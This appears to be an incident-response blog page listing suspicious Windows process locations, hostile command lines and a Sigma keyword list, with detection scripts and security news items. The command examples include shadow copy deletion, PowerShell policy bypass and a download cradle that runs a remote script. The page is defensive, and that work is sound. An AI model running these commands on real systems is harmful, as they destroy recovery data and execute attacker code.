Cybernews and other cool stuff
Malicious commands for incident response

What is practically always suspicious / evil:

See also: day-2-for508-2.html


cmd.exe outside of C:\Windows\System32 or C:\Windows

*.exe, *.com, *.vbs, *.bat, *.dll calls in "world writable" directories such as:

\tmp, \temp\, \Users\*, C:\Users\YourUserName\Roaming, C:\Users\YourUserName\Local, C:\Users\YourUserName\LocalLow

Calls to fake system programs running from the wrong location. The correct locations are listed below. If you see one of these names started from another directory:

  • Have a RAM and HDD snapshot created.
  • Contact the person responsible (or the caller) and verify the legitimacy of the action.
  • If applicable, isolate the called program and run it in the sandbox.
  • If applicable, check the IOCs from the sandbox in MISP and TheHive.
  • If applicable, have the machine isolated / disconnected from the network.
  • If applicable, initiate a forensic analysis.

The same applies in the opposite case: these programs being opened for writing / modification outside of an update.

System
  • Image Path: N/A for system.exe (not generated from an executable image)
  • Parent Process: None
  • Number of Instances: One

smss.exe
  • Image Path: %SystemRoot%\System32\smss.exe
  • Parent Process: System
  • Number of Instances: One master instance and another child instance per session. Children exit after creating their session.

wininit.exe
  • Image Path: %SystemRoot%\System32\wininit.exe
  • Parent Process: Created by an instance of smss.exe that exits, so tools usually do not provide the parent process name.
  • Number of Instances: One

RuntimeBroker.exe
  • Image Path: %SystemRoot%\System32\RuntimeBroker.exe
  • Parent Process: svchost.exe
  • Number of Instances: One or more

taskhostw.exe
  • Image Path: %SystemRoot%\System32\taskhostw.exe
  • Parent Process: svchost.exe
  • Number of Instances: One or more

winlogon.exe
  • Image Path: %SystemRoot%\System32\winlogon.exe
  • Parent Process: Created by an instance of smss.exe that exits, so analysis tools usually do not provide the parent process name.
  • Number of Instances: One or more

csrss.exe
  • Image Path: %SystemRoot%\System32\csrss.exe
  • Parent Process: Created by an instance of smss.exe that exits, so analysis tools usually do not provide the parent process name.
  • Number of Instances: Two or more

services.exe
  • Image Path: %SystemRoot%\System32\services.exe
  • Parent Process: wininit.exe
  • Number of Instances: One

svchost.exe
  • Image Path: %SystemRoot%\system32\svchost.exe
  • Parent Process: services.exe (most often)
  • Number of Instances: Many (generally at least 10)

lsaiso.exe
  • Image Path: %SystemRoot%\System32\lsaiso.exe
  • Parent Process: wininit.exe
  • Number of Instances: Zero or one

lsass.exe
  • Image Path: %SystemRoot%\System32\lsass.exe
  • Parent Process: wininit.exe
  • Number of Instances: One

explorer.exe
  • Image Path: %SystemRoot%\explorer.exe
  • Parent Process: Created by an instance of userinit.exe that exits, so analysis tools usually do not provide the parent process name.
  • Number of Instances: One or more per interactively logged-on user
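As an added example (not code from the original page), the following Python script encodes the expected image paths, parent processes and instance counts listed above together with the "cmd.exe outside System32" and "executable in a world-writable directory" rules, and runs them over a constructed process listing. The expansion of %SystemRoot% to C:\Windows, the function names and the sample records are assumptions; the Roaming / Local / LocalLow profile directories named above are covered by the C:\Users\* wildcard.

```python
"""Check a process listing against the expected locations and parents listed above."""
from collections import Counter
import fnmatch

# Expected image path and parent for the core Windows processes, as listed on this page.
# A parent of None means the real parent (smss.exe / userinit.exe) has exited, so tools show none.
BASELINE = {
    "smss.exe":          (r"%SystemRoot%\System32\smss.exe",          {"system", "smss.exe"}),
    "wininit.exe":       (r"%SystemRoot%\System32\wininit.exe",       {None}),
    "runtimebroker.exe": (r"%SystemRoot%\System32\RuntimeBroker.exe", {"svchost.exe"}),
    "taskhostw.exe":     (r"%SystemRoot%\System32\taskhostw.exe",     {"svchost.exe"}),
    "winlogon.exe":      (r"%SystemRoot%\System32\winlogon.exe",      {None}),
    "csrss.exe":         (r"%SystemRoot%\System32\csrss.exe",         {None}),
    "services.exe":      (r"%SystemRoot%\System32\services.exe",      {"wininit.exe"}),
    "svchost.exe":       (r"%SystemRoot%\System32\svchost.exe",       {"services.exe"}),  # "most often"
    "lsaiso.exe":        (r"%SystemRoot%\System32\lsaiso.exe",        {"wininit.exe"}),
    "lsass.exe":         (r"%SystemRoot%\System32\lsass.exe",         {"wininit.exe"}),
    "explorer.exe":      (r"%SystemRoot%\explorer.exe",               {None}),
}
# Processes the page says run once (lsaiso: zero or one); csrss.exe is expected two or more times.
SINGLETONS = ("wininit.exe", "services.exe", "lsass.exe", "lsaiso.exe")

# "World writable" locations from the page; the C:\Users\* wildcard also covers the
# Roaming / Local / LocalLow profile directories named there.
WRITABLE_GLOBS = (r"*\tmp\*", r"*\temp\*", r"c:\users\*")
EXEC_EXT = (".exe", ".com", ".vbs", ".bat", ".dll")
SYSTEM_ROOT = r"C:\Windows"   # assumed expansion of %SystemRoot% for the comparison


def norm(path):
    """Expand %SystemRoot% and lower-case so paths compare reliably."""
    return path.replace("%SystemRoot%", SYSTEM_ROOT).lower()


def in_writable_dir(image_path):
    p = norm(image_path)
    return p.endswith(EXEC_EXT) and any(fnmatch.fnmatchcase(p, g) for g in WRITABLE_GLOBS)


def check_process(name, image_path, parent):
    """Return the findings for one process record (an empty list means it looks normal)."""
    findings = []
    name, p = name.lower(), norm(image_path)
    parent = parent.lower() if parent else None
    system_dirs = {norm(r"%SystemRoot%\System32"), norm("%SystemRoot%")}
    if name == "cmd.exe" and p.rsplit("\\", 1)[0] not in system_dirs:
        findings.append("cmd.exe outside of System32 / Windows")
    if in_writable_dir(image_path):
        findings.append("executable started from a world-writable directory")
    if name in BASELINE:
        exp_path, exp_parents = BASELINE[name]
        if p != norm(exp_path):
            findings.append(f"fake system program: expected {exp_path}")
        if parent not in exp_parents:
            findings.append(f"unexpected parent {parent!r}, expected {sorted(map(str, exp_parents))}")
    return findings


def check_instance_counts(records):
    """Instance-count rules from the page: singletons at most once, csrss.exe at least twice."""
    counts = Counter(r[0].lower() for r in records)
    findings = [f"{n}: {counts[n]} instances, expected at most one"
                for n in SINGLETONS if counts[n] > 1]
    if 0 < counts["csrss.exe"] < 2:
        findings.append("csrss.exe: fewer than two instances")
    return findings


def audit(records):
    """Map each suspicious (name, image path) to its findings, plus the instance-count findings."""
    report = {}
    for name, path, parent in records:
        f = check_process(name, path, parent)
        if f:
            report[(name, path)] = f
    extra = check_instance_counts(records)
    if extra:
        report[("*", "instance counts")] = extra
    return report


# Constructed sample listing: (process name, image path, parent process name or None).
SAMPLE = [
    ("System",       "N/A",                                          None),
    ("smss.exe",     r"C:\Windows\System32\smss.exe",                "System"),
    ("csrss.exe",    r"C:\Windows\System32\csrss.exe",               None),
    ("csrss.exe",    r"C:\Windows\System32\csrss.exe",               None),
    ("wininit.exe",  r"C:\Windows\System32\wininit.exe",             None),
    ("services.exe", r"C:\Windows\System32\services.exe",            "wininit.exe"),
    ("lsass.exe",    r"C:\Windows\System32\lsass.exe",               "wininit.exe"),
    ("lsass.exe",    r"C:\Users\alice\AppData\Local\Temp\lsass.exe", "explorer.exe"),   # fake lsass
    ("svchost.exe",  r"C:\Windows\System32\svchost.exe",             "services.exe"),
    ("explorer.exe", r"C:\Windows\explorer.exe",                     None),
    ("cmd.exe",      r"C:\Users\alice\Downloads\cmd.exe",            "explorer.exe"),   # misplaced cmd
]

if __name__ == "__main__":
    for key, findings in audit(SAMPLE).items():
        print(key, "->", "; ".join(findings))
```

The fake lsass.exe in the sample trips three rules at once (wrong path, wrong parent, world-writable directory) and a fourth via the instance count, which is the kind of stacking that justifies the snapshot-and-isolate steps above; a svchost.exe with a parent other than services.exe only produces the parent finding, and because the page says "most often" that one deserves a look rather than an automatic alert.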


Removing the chance of evidence recovery (shadow copy deletion):

"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet


PowerShell

Bypass the PowerShell-internal security controls by starting PowerShell with the script to run passed as a parameter:

powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy bypass -File "C:\windows\system32\evil.ps1"


Execute files other than .ps1 files:

powershell.exe -ep Bypass "& {Get-Content .\malware.ps2 | iex}"


Execute directly in memory (file-less attack):

powershell.exe -ep Bypass -nop -noexit -c iex ((New-Object Net.WebClient).DownloadString('https://[website]/malware.ps1'))


Detect cmdlet names from well-known PowerShell exploitation frameworks (keyword list from a Sigma rule):


- "*Invoke-DllInjection*"
- "*Invoke-Shellcode*"
- "*Invoke-WmiCommand*"
- "*Get-GPPPassword*"
- "*Get-Keystrokes*"
- "*Get-TimedScreenshot*"
- "*Get-VaultCredential*"
- "*Invoke-CredentialInjection*"
- "*Invoke-Mimikatz*"
- "*Invoke-NinjaCopy*"
- "*Invoke-TokenManipulation*"
- "*Out-Minidump*"
- "*VolumeShadowCopyTools*"
- "*Invoke-ReflectivePEInjection*"
- "*Invoke-UserHunter*"
- "*Find-GPOLocation*"
- "*Invoke-ACLScanner*"
- "*Invoke-DowngradeAccount*"
- "*Get-ServiceUnquoted*"
- "*Get-ServiceFilePermission*"
- "*Get-ServicePermission*"
- "*Invoke-ServiceAbuse*"
- "*Install-ServiceBinary*"
- "*Get-RegAutoLogon*"
- "*Get-VulnAutoRun*"
- "*Get-VulnSchTask*"
- "*Get-UnattendedInstallFile*"
- "*Get-ApplicationHost*"
- "*Get-RegAlwaysInstallElevated*"
- "*Get-Unconstrained*"
- "*Add-RegBackdoor*"
- "*Add-ScrnSaveBackdoor*"
- "*Gupt-Backdoor*"
- "*Invoke-ADSBackdoor*"
- "*Enabled-DuplicateToken*"
- "*Invoke-PsUaCme*"
- "*Remove-Update*"
- "*Check-VM*"
- "*Get-LSASecret*"
- "*Get-PassHashes*"
- "*Show-TargetScreen*"
- "*Port-Scan*"
- "*Invoke-PoshRatHttp*"
- "*Invoke-PowerShellTCP*"
- "*Invoke-PowerShellWMI*"
- "*Add-Exfiltration*"
- "*Add-Persistence*"
- "*Do-Exfiltration*"
- "*Start-CaptureServer*"
- "*Get-ChromeDump*"
- "*Get-ClipboardContents*"
- "*Get-FoxDump*"
- "*Get-IndexedItem*"
- "*Get-Screenshot*"
- "*Invoke-Inveigh*"
- "*Invoke-NetRipper*"
- "*Invoke-EgressCheck*"
- "*Invoke-PostExfil*"
- "*Invoke-PSInject*"
- "*Invoke-RunAs*"
- "*MailRaider*"
- "*New-HoneyHash*"
- "*Set-MacAttribute*"
- "*Invoke-DCSync*"
- "*Invoke-PowerDump*"
- "*Exploit-Jboss*"
- "*Invoke-ThunderStruck*"
- "*Invoke-VoiceTroll*"
- "*Set-Wallpaper*"
- "*Invoke-InveighRelay*"
- "*Invoke-PsExec*"
- "*Invoke-SSHCommand*"
- "*Get-SecurityPackages*"
- "*Install-SSP*"
- "*Invoke-BackdoorLNK*"
- "*PowerBreach*"
- "*Get-SiteListPassword*"
- "*Get-System*"
- "*Invoke-BypassUAC*"
- "*Invoke-Tater*"
- "*Invoke-WScriptBypassUAC*"
- "*PowerUp*"
- "*PowerView*"
- "*Get-RickAstley*"
- "*Find-Fruit*"
- "*HTTP-Login*"
- "*Find-TrustedDocuments*"
- "*Invoke-Paranoia*"
- "*Invoke-WinEnum*"
- "*Invoke-ARPScan*"
- "*Invoke-PortScan*"
- "*Invoke-ReverseDNSLookup*"
- "*Invoke-SMBScanner*"
- "*Invoke-Mimikittenz*"
- "*Invoke-AllChecks*"
false_positives:
- Get-SystemDriveInfo # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1
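As an added example that is not part of the original page or the Sigma rule, the following Python script turns the command lines above (shadow copy deletion, execution policy bypass, hidden window, non-.ps1 execution, in-memory download) and a subset of the cmdlet keyword list into checks over constructed process-creation command lines. It also shows how the listed false positive is handled: Get-SystemDriveInfo would otherwise match the "*Get-System*" wildcard. The function names, the sample events and the choice to strip false-positive names before matching are assumptions; the abbreviated switches -ep, -w and -nop are the short forms of -ExecutionPolicy, -WindowStyle and -NoProfile that powershell.exe accepts.

```python
"""Flag the command-line patterns and cmdlet names described above in process-creation events."""
import fnmatch
import re

# Subset of the cmdlet keyword list from the Sigma rule fragment on this page (wildcards as in the
# rule); in practice load the whole list.
SUSPICIOUS_CMDLETS = ("*Invoke-DllInjection*", "*Invoke-Mimikatz*", "*Get-GPPPassword*",
                      "*Invoke-DCSync*", "*Get-System*", "*PowerUp*", "*Invoke-AllChecks*")
# Benign names the rule lists as false positives; Get-SystemDriveInfo would otherwise hit "*Get-System*".
FALSE_POSITIVES = ("Get-SystemDriveInfo",)

# Command-line indicators taken from the examples on this page. -ep, -w and -nop are the
# abbreviated forms of -ExecutionPolicy, -WindowStyle and -NoProfile that powershell.exe accepts.
INDICATORS = [
    ("shadow copy deletion",         re.compile(r"vssadmin(?:\.exe)?\b.*\bdelete\s+shadows", re.I)),
    ("execution policy bypass",      re.compile(r"(?:-ep|-exec(?:utionpolicy)?)\s+bypass", re.I)),
    ("hidden window",                re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no profile",                   re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("in-memory download",           re.compile(r"downloadstring", re.I)),
    ("invoke-expression",            re.compile(r"\biex\b|invoke-expression", re.I)),
    ("non-.ps1 script piped to iex", re.compile(r"get-content\s+\S+\.(?!ps1\b)\w+\s*\|\s*iex", re.I)),
]


def analyze_command_line(cmdline):
    """Return (matched indicator names, matched cmdlet patterns) for one command line."""
    hits = [name for name, rx in INDICATORS if rx.search(cmdline)]
    text = cmdline.lower()
    for fp in FALSE_POSITIVES:              # strip known-benign names before wildcard matching
        text = text.replace(fp.lower(), "")
    cmdlets = [pat for pat in SUSPICIOUS_CMDLETS if fnmatch.fnmatchcase(text, pat.lower())]
    return hits, cmdlets


def triage(events):
    """Return the events that carry at least one finding, together with their findings."""
    flagged = []
    for cmdline in events:
        hits, cmdlets = analyze_command_line(cmdline)
        if hits or cmdlets:
            flagged.append({"cmdline": cmdline, "indicators": hits, "cmdlets": cmdlets})
    return flagged


# Constructed sample of process command lines (the first four are the page's own examples).
SAMPLE_EVENTS = [
    r'"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet',
    r'powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy bypass -File "C:\windows\system32\evil.ps1"',
    r'powershell.exe -ep Bypass "& {Get-Content .\malware.ps2 | iex}"',
    r"powershell.exe -ep Bypass -nop -noexit -c iex ((New-Object Net.WebClient).DownloadString('https://[website]/malware.ps1'))",
    r'powershell.exe -c "Invoke-Mimikatz"',
    r"powershell.exe -File C:\Windows\WinSxS\CL_Utility.ps1 Get-SystemDriveInfo",   # benign (false positive list)
    r"powershell.exe Get-ChildItem C:\Users",                                      # benign
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["cmdline"][:60], "->", f["indicators"], f["cmdlets"])
```

Stripping the false-positive names before matching is a deliberate choice: suppressing every event that merely contains Get-SystemDriveInfo would also hide a command line that runs that benign cmdlet alongside a real "*Get-System*" hit, and the last test case below checks that such a line is still flagged.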


Exploiting iMessage: The Remote, Interaction-less Attack Surface of

Natalie Silvanovich (AKA natashenka) from Project Zero published an extremely interesting slide deck on the exploitation of the iPhone.

While vulnerabilities and exploits for iPhones are quite rare anyway, this is surely worth a look.

Check out: Google's Project Zero

I'm Open Sourcing the Have I Been Pwned Code Base

The well-known service "Have I Been Pwned" is making its source code open source.

Troy Hunt published a statement saying that the source code (excluding the databases) will become open source.

Thanks Troy for that step...!!!


Unknown hackers fight back Emotet

First reported by ZDNet:

A vigilante is sabotaging the Emotet botnet by replacing malware payloads with GIFs

An unknown vigilante hacker has been sabotaging the operations of the recently-revived Emotet botnet by replacing Emotet payloads with animated GIFs, effectively preventing victims from getting infected.

The sabotage, which started three days ago, on July 21, has grown from a simple joke to a serious issue impacting a large portion of the Emotet operation.

According to Cryptolaemus, a group of white-hat security researchers tracking the Emotet botnet, the vigilante is now poisoning around a quarter of all Emotet's payload downloads.


JSOF: Ripple20 aka Treck

JSOF published a scary finding: many embedded TCP/IP stacks (based on the Treck stack) contain missing-sanitisation vulnerabilities that allow a buffer overflow and remote code execution (RCE).

From JSOF:

Ripple20 reached critical IoT devices from a wide range of fields, involving a diverse group of vendors. Affected vendors range from one-person boutique shops to Fortune 500 multinational corporations, including HP, Schneider Electric, Intel, Rockwell Automation, Caterpillar, Baxter, as well as many other major international vendors suspected of being vulnerable in medical, transportation, industrial control, enterprise, energy (oil/gas), telecom, retail and commerce, and other industries.

A detailed technical report on two of the vulnerabilities and their exploitation can be found in the CVE-2020-11896/CVE-2020-11898 whitepaper.

JSOF will be providing scripts for the identification of products running Treck upon request.
For more information or requests please contact: Ripple20@jsof-tech.com

Fix: install the vendor patches.

Mitigation: implement the IDS/IPS (Suricata) rule from CERT/CC and check on the CERT/CC page whether your system is known to be affected (e.g. Cisco ASR5xxx).

Vulnerabilities include:

CVE-2020-11896, CVE-2020-11897, CVE-2020-11898, CVE-2020-11899, CVE-2020-11900, CVE-2020-11901, CVE-2020-11902, CVE-2020-11903, CVE-2020-11904, CVE-2020-11905, CVE-2020-11906, CVE-2020-11907, CVE-2020-11908, CVE-2020-11909, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912, CVE-2020-11913, CVE-2020-11914


GRUB2 - BootHole (CVE-2020-10713)

Eclypsium discovered a buffer overflow in the boot loader GRUB2 that can be used as a persistence mechanism. Because the attacker needs to modify the grub.cfg file, elevated rights are required.

In the course of Eclypsium’s analysis, we have identified a buffer overflow vulnerability in the way that GRUB2 parses content from the GRUB2 config file (grub.cfg).


Kill chain: "persistence"

Such an attack would require an attacker to have elevated privileges. However, it would provide the attacker with a powerful additional escalation of privilege and persistence on the device, even with Secure Boot enabled and properly performing signature verification on all loaded executables.

Risk: medium

Mitigation/Fix: revoke the UEFI certificates and install the vendors' patches.

Caution: Red Hat had feedback that a lot of machines had issues booting after applying their patch.



Cloudflare outage on July 17, 2020


John Graham-Cumming

Today a configuration error in our backbone network caused an outage for Internet properties and Cloudflare services that lasted 27 minutes. We saw traffic drop by about 50% across our network. Because of the architecture of our backbone this outage didn’t affect the entire Cloudflare network and was localized to certain geographies.

The outage occurred because, while working on an unrelated issue with a segment of the backbone from Newark to Chicago, our network engineering team updated the configuration on a router in Atlanta to alleviate congestion. This configuration contained an error that caused all traffic across our backbone to be sent to Atlanta. This quickly overwhelmed the Atlanta router and caused Cloudflare network locations connected to the backbone to fail.

The affected locations were San Jose, Dallas, Seattle, Los Angeles, Chicago, Washington, DC, Richmond, Newark, Atlanta, London, Amsterdam, Frankfurt, Paris, Stockholm, Moscow, St. Petersburg, São Paulo, Curitiba, and Porto Alegre. Other locations continued to operate normally.

For the avoidance of doubt: this was not caused by an attack or breach of any kind.

We are sorry for this outage and have already made a global change to the backbone configuration that will prevent it from being able to occur again.



Source code of the German Corona app published for personal review

Those who do not trust the app can now review its source code.

Check this GitHub for the source.

German police using Corona data for investigations

Did you know that the German police are using the contact lists that everybody has to fill out, e.g. when eating in a restaurant, for their investigations?

According to the State Criminal Police Office (LKA), this is possible under "investigations of any kind" ("Ermittlungen jedweglicher Art"), even though the data was not meant to be used for such purposes.

Scary to me ...



German BKA can read WhatsApp conversations

The German Federal Criminal Police Office (BKA) is able to read WhatsApp conversations. This reportedly takes quite a high effort and presumably relies on the WhatsApp Web function.

Check the official news article (in German) at "tagesschau.de".

'Meow' attack has deleted almost 4,000 unsecured databases

Things change. While data from unsecured databases used to be silently taken, such databases are now also being deleted. At least the owners are now confronted with the consequences of leaving (personal) data unsecured.

Check BleepingComputer for the original article.


Finally: the German version of the "Corona App" is out

Now that the first Corona lockdown is almost over, the Germans also have their app.
I will not suggest whether or not to use this tool, but in my opinion the app has nothing to do with conspiracy or state control. But this is just my personal view.


Play with real IPv6 /48 at Hurricane Electric

Get yourself a /48 IPv6 tunnel (65535 times a /64) at Hurricane Electric and prove your IPv6 capabilities with a free exam.

SMBGhost Exploit PoC

"chompie1337" is giving us a PoC for the SMBGhost vulnerability to test systems in your environment.

Even if it is not used to actively test your systems (bluescreen possibility), it is an excellent chance to learn more about the "ghost of SMB3".


SMBGhost_RCE_PoC

RCE PoC for CVE-2020-0796 "SMBGhost"

For demonstration purposes only! Only use this as a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die.

Now that that's out of the way....

Windows Security Alert: Core System File Zero-Days Confirmed Unpatched


Davey Winder (Senior Contributor at Forbes) reports on four new zero-days:

A core Windows system file called splwow64.exe, which is a printer driver host for 32-bit apps. The Spooler Windows OS (Windows 64-bit) executable enables 32-bit applications to be compatible with a 64-bit Windows system. CVE-2020-0915, CVE-2020-0916 and CVE-2020-0986 all impact that splwow64 Windows system file. All three are classified as high on the CVE severity scoring system with a 7.0 rating.
[…]
The last of the zero-day vulnerabilities publicly disclosed by ZDI does not have a CVE number, only a ZDI one of ZDI-20-666. This is another privilege escalation vulnerability, but this time within the handling of WLAN connection profiles. An attacker would have to create a malicious profile that would then enable them to disclose credentials for that computer account, which can then be leveraged in an exploit. Although also rated high by ZDI, this vulnerability was not determined to be severe enough for fixing "in the current version" by Microsoft, which closed the case without providing a patch.

ID / ZDI advisory / action / mitigation / risk: "priv. escalation"

CVE-2020-0915 (ZDI-20-662)
CVE-2020-0986 (ZDI-20-663)
CVE-2020-0915 (ZDI-20-664)
CVE-2020-0916 (ZDI-20-665)

ZDI describes all four splwow64 advisories identically:

  • Action: The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to disclose information from low integrity in the context of the current user at medium integrity.
  • Mitigation: Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it.
  • Risk: This vulnerability allows local attackers to disclose information on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

ZDI-20-666 (no CVE)

  • Action: The specific flaw exists within the handling of WLAN connection profiles. By creating a malicious profile, an attacker can disclose credentials for the machine account. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of an administrator.
  • Mitigation: Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it.
  • Risk: This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.


Apple releases iOS 13.5 to the public with Exposure Notification API, Face ID enhancements, more

Probe opened after mosques blare ‘Bella Ciao’ from minarets in Turkey’s west

The Italian resistance song "Bella Ciao" (in a Turkish version) was broadcast from several mosques in the Izmir area on May 21st 2020, Hurriyet reported.

İzmir Provincial Religious Directorate initially denied reports of such a broadcast by issuing a statement on its social media account, however, it later removed this post.

“According to our initial analysis, unidentified people sabotaged our central adhan [call to prayer] system in an illegal way,” the directorate said in a second statement.

Sourcecode: Corona-Warn-App Server

SAP is sharing its alpha-state code of the Corona-Warn-App server that might be made available for Germany. Have a look at the code and find out what it does with your personal data and how.

The goal of this project is to develop the official Corona-Warn-App for Germany based on the exposure notification API from Apple and Google. The apps (for both iOS and Android) use Bluetooth technology to exchange anonymous encrypted data with other mobile phones (on which the app is also installed) in the vicinity of an app user's phone. The data is stored locally on each user's device, preventing authorities or other parties from accessing or controlling the data. This repository contains the implementation of the server for encryption keys for the Corona-Warn-App. This implementation is still a work in progress, and the code it contains is currently alpha-quality code.

BIAS: Bluetooth Impersonation AttackS

Daniele Antonioli, Nils Ole Tippenhauer and Kasper Rasmussen have discovered a flaw within the Bluetooth stack that allows an attacker to fake an already authenticated (paired) connection with a new device by sniffing the traffic between two devices during the pairing process.

So be careful when pairing devices in public places. The sniffed data could also be used to pair an unknown device without your knowledge.

easyJet Loses 9 Million Customers’ Data To Hackers

Our investigation found that the email address and travel details of approximately 9 million customers were accessed. These affected customers will be contacted in the next few days. If you are not contacted then your information has not been accessed.  Other than as referenced in the following paragraph, passport details and credit card details of these customers were not accessed. 

[…]

There is no evidence that any personal information of any nature has been misused, however, on the recommendation of the ICO, we are communicating with the approximately 9 million customers whose travel details were accessed to advise them of protective steps to minimise any risk of potential phishing.  We are advising customers to continue to be alert as they would normally be, especially should they receive any unsolicited communications. We also advise customers to be cautious of any communications purporting to come from easyJet or easyJet Holidays.